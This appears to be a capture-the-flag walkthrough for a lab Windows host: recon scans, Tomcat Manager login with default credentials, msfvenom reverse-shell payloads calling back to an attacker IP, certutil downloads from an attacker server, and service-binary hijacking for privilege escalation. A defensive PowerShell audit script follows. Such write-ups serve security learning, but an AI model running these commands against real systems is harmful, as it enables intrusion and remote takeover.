nmap -A -p- -oA deployable 172.31.1.13 --min-rate=10000 --script=vuln --script-timeout=15 -v

nmap -sC -sV -O -p- -oA deployable 172.31.1.13

nmap -sU -O -p- -oA deployable-udp 172.31.1.13

nikto -h 172.31.1.13:80

gobuster dir -k -u http://172.31.1.13/ -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt -t 100

https://github.com/netbiosX/Default-Credentials/blob/master/Apache-Tomcat-Default-Passwords.mdown

We use tomcat:s3cret as the credentials and log in to the Manager App.

msfvenom -p java/jsp_shell_reverse_tcp LHOST=10.10.0.12 LPORT=4444 -f war -o deploy_shell.war

nc -lvnp 4444

Before this, we upload and run the winPEAS binary.

python3 -m http.server 8888

certutil.exe -urlcache -split -f http://10.10.0.12:8888/winPEASany.exe winPEASany.exe

When we run winPEAS we see that it says "No quotes or spaces detected".

python3 -m http.server 8888

certutil.exe -urlcache -split -f http://10.10.0.12:8888/accesschk.exe accesschk.exe

accesschk.exe /accepteula -ucqv Deploy

We see that the tomcat user has permission to start and stop the service.

We go into the Deploy Ready directory.

We create a shell called Service.exe.

msfvenom -p windows/shell_reverse_tcp LHOST=10.10.0.12 LPORT=5555 -f exe -o Service.exe

python3 -m http.server 8888

certutil.exe -urlcache -split -f http://10.10.0.12:8888/Service.exe Service.exe

nc -lvnp 5555

In C:\Program Files\Deploy Ready we run the following:

sc start Deploy
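The escalation above works because a low-privileged account can write into the directory holding a service binary and also start the service. The following PowerShell audit script is an added example (not part of the original writeup) that flags services whose image file or containing directory grants write access to Users, Authenticated Users or Everyone; the principal list, the rights mask and the image-path parsing are assumptions of this example.

```powershell
# Added audit script, not part of the original writeup. Flags services whose
# image file, or the directory containing it, is writable by a low-privileged
# principal. That is the condition abused above: the tomcat user could drop
# its own Service.exe into "C:\Program Files\Deploy Ready" and start the
# Deploy service. Run from an elevated PowerShell on the host being audited.

# Assumption: these are the principals treated as low-privileged.
$LowPrivPrincipals = @('BUILTIN\Users', 'NT AUTHORITY\Authenticated Users', 'Everyone')
# Any of these rights lets a principal replace or tamper with the binary.
$WriteRights = [System.Security.AccessControl.FileSystemRights]'Write, Modify, FullControl'

function Get-ImagePath([string]$PathName) {
    # Image paths may be quoted and may carry arguments after the executable.
    if ($PathName -match '^"([^"]+)"') { return $Matches[1] }
    # Unquoted: take everything up to the first ".exe" (match is case-insensitive).
    if ($PathName -match '^(.+?\.exe)') { return $Matches[1] }
    return $PathName
}

function Test-LowPrivWrite([string]$Path) {
    if (-not $Path -or -not (Test-Path -LiteralPath $Path)) { return $false }
    foreach ($ace in (Get-Acl -LiteralPath $Path).Access) {
        if ($ace.AccessControlType -ne 'Allow') { continue }
        if ($LowPrivPrincipals -notcontains $ace.IdentityReference.Value) { continue }
        if ([int]($ace.FileSystemRights -band $WriteRights) -ne 0) { return $true }
    }
    return $false
}

Get-CimInstance Win32_Service | ForEach-Object {
    $exe = Get-ImagePath $_.PathName
    if (-not $exe) { return }   # skip services without an image path
    $dir = Split-Path -Parent $exe
    $exeWritable = Test-LowPrivWrite $exe
    $dirWritable = Test-LowPrivWrite $dir
    if ($exeWritable -or $dirWritable) {
        [pscustomobject]@{
            Service     = $_.Name
            RunsAs      = $_.StartName
            ImagePath   = $exe
            ExeWritable = $exeWritable
            DirWritable = $dirWritable
        }
    }
} | Format-Table -AutoSize

# Fix for a flagged directory: remove the offending grant, for example
#   icacls "C:\Program Files\Deploy Ready" /remove:g "BUILTIN\Users"
# (if the ACE is inherited, correct it on the parent directory instead), then
# re-check with accesschk, as above, that only administrators keep write and
# service start/stop rights.
```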

Copyright © 2022 Cu3rv0x. All rights reserved.